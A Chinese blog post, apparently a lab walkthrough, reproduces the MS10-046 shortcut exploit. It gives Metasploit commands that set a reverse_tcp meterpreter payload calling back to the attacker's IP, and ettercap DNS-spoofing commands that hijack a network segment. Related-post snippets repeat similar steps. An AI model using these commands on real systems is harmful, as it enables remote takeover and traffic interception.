【无标题】ms10_046复现

于 2023-07-01 18:33:23 发布
阅读量118 收藏 1
点赞数 1
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73853543/article/details/131493452
版权
该文章描述了在一个Kali2021.4a和Win7处于同一网段的桥接环境中,如何利用ms10-046漏洞设置metasploit的reverse_tcppayload,然后通过ettercap进行DNS欺骗的步骤,包括设置srvhost,运行exploit,以及使用ettercap命令来劫持网络流量。
摘要由CSDN通过智能技术生成

ms10-046
环境: kali 2021.4a 桥接模式 192.168.188.2
Win7 桥接模式
kali和win7在同一网段
步骤:
(1)msf
在这里插入图片描述

(2)search ms10_046
在这里插入图片描述

(3)use 0
在这里插入图片描述

(4)set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

(5)set srvhost kali的ip
在这里插入图片描述

(6)Run
在这里插入图片描述

http://192.168.188.2:80//url复制到目标浏览器访问会自动进入文件夹
在这里插入图片描述

cd /etc/ettercap
在这里插入图片描述

Ls
在这里插入图片描述

vi etter.dns//配合ettercap进行dns欺骗
在这里插入图片描述

ettercap -T -q -i eth0 -P dns_spoof //开启ettercap劫持所有网段
在这里插入图片描述在这里插入图片描述在这里插入图片描述

m0_73853543
关注
渗透测试基础(六) MS10-046漏洞攻击
Venus_majian
06-24 128
MS10-046
MS12-020远程桌面漏洞复现
afei001
03-24 667
MS12-020漏洞简介     MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞。 RDP远程桌面协议简介     远程桌面协议(RDP,Remote Desktop Protocol)是一个多通道(multi-channel)的协议,用户可以通过客户端远程连接服务端。占用端口:3389 标题漏洞影响范围     Microsoft Windows...
Metasploit-MS10-046Web反弹连接复现
5L2g556F5ZWl77yf
09-08 535
一. 概述 Windows Shell 中的漏洞可能允许远程执行代码 (2286198) 发布时间: 2010年8月2日 | 更新时间: 2010年8月24日 版本: 1.2 详情请查阅下方微软官方文档 概览 中文名:无 微软官方编号:MS10-046 CVE编号:无 类型:远程代码执行 官方评级:严重 影响系统:winxp,win7,winserver03,winserver08r2 二. 复现 攻击机 靶机 IP:192.168.3.70 192
MS10-046漏洞复现配合DNS欺骗
qq_43655183的博客
09-07 713
利用ms10_046漏洞生成攻击URL: 使用漏洞攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 设置payload set payload windows/meterpreter/reverse_tcp 设置攻击参数 set SRVHOST 攻击机IP set LHOST 攻击机IP 开始渗透 run ...
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 5434
漏洞复现MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4937
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
MS10-046漏洞复现
weifengbbt的博客
11-08 1905
MS10-046漏洞复现0x00 前言0x01 环境0x02 过程0x03 结语0x04 建议 0x00 前言 这是我对msf里漏洞利用的学习记录 0x01 环境 1. 目标机环境 Windows xp sp3 IE7浏览器 2. 攻击机环境 kali 3. 拓扑结构 0x02 过程 1. 检查网络联通 ping 192.168.37.129 2. 启动Metasploit msfconsol...
【kali】25 漏洞扫描——nmap、smb-vuln-ms10-061.nse(枚举共享打印机)
(∪.∪ )...zzz的博客
10-22 2346
这里写自定义目录标题一、查看脚本,注意categories二、vuln三、smb-vuln-ms10-061.nse查看脚本查看网络中存活的主机使用脚本扫描目标系统的共享打印机 nmap扫描脚本:500+,不同类别 apt-get install ibus ibus-pinyin #安装中文输入法 一、查看脚本,注意categories cat /usr/share/nmap/scripts/script.db categories里说明了脚本的类型 exploit:漏洞利用 二、vuln c
ms08067的Exp源代码和exe
10-27
【描述】"ms08067的Exp源代码和exe,欢迎下载" 提示了这些资源是公开的,并且可能被安全研究人员、渗透测试人员或者恶意黑客用于了解、分析或复现MS08-067漏洞的利用过程。下载这些文件可能有助于理解漏洞的工作原理...
ms14-068利用工具包.zip
07-01
【标题】"ms14-068利用工具包.zip" 涉及的主要知识点是针对微软在2014年发布的安全公告MS14-068的漏洞利用工具。这个工具包包含了两个可执行文件(MS14-068.exe)以及一个名为“minikataz”的64位程序,这可能是一个...
alphafold复现(conda版)
huzerong的博客
08-15 2418
alphafold复现(conda版欢迎使用Markdown编辑器测试服务器首次设置合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学
微软MS10-046漏洞的利用
qq_50854662的博客
05-26 855
微软MS10-046漏洞的利用 0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构 0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. exploit9. 查看会话10. 进入交互模式11. 拿到shell 0x00 前言 这是我
MS10_046漏洞利用
彼岸花苏陌的博客
12-04 660
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 ...
Metasploit Framework渗透测试框架基础入门到进阶实战
02-15
一、课程概要      本课程主要分享Metasploit Framework渗透测试框架基础入门到进阶实战教程!二、适合人员      1、零基础大学生      2、IT技术人员      3、运维工程师      4、渗透测试工程师三、特别说明      1、本课程支持一次购买,永久观看!      2、本课程支持一次购买,永久更新!      
网络安全工程师教你:100多个Kali Linux白帽子安全工具使用
10-19
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。面向专业的安全测试和安全审计。集成化:预装超过300个安全测试工具。兼容好:Kali可以安装到手机、PC和树莓派等。安全性:Kali Linux开发团队由一群可信任的人组成,他们只能在使用多种安全协议的时候提交包或管理源。免费用: Kali Linux一如既往的免费。你永远无需为Kali Linux付费。 
MS10_046_shortcut_icon_dllloader漏洞复现
m0_48907714的博客
03-11 5412
MS10_046漏洞复现 漏洞介绍:Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 00x01实验环境 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp ip:192.168.72.6 使用的工具:msfconsole 00x02实验过程 打开两台虚拟机,打开kali的msf软件,搜索MS10_046漏洞,找到三个模块 本次复现第二个模
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1506
ms08_067,ms10_046
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
热门推荐
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神马都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046的漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
永恒之蓝ms17_010漏洞复现实验
最新发布
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞的复现实验。这是因为复现该漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现该漏洞,以免违法和造成不必要的损失。 如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值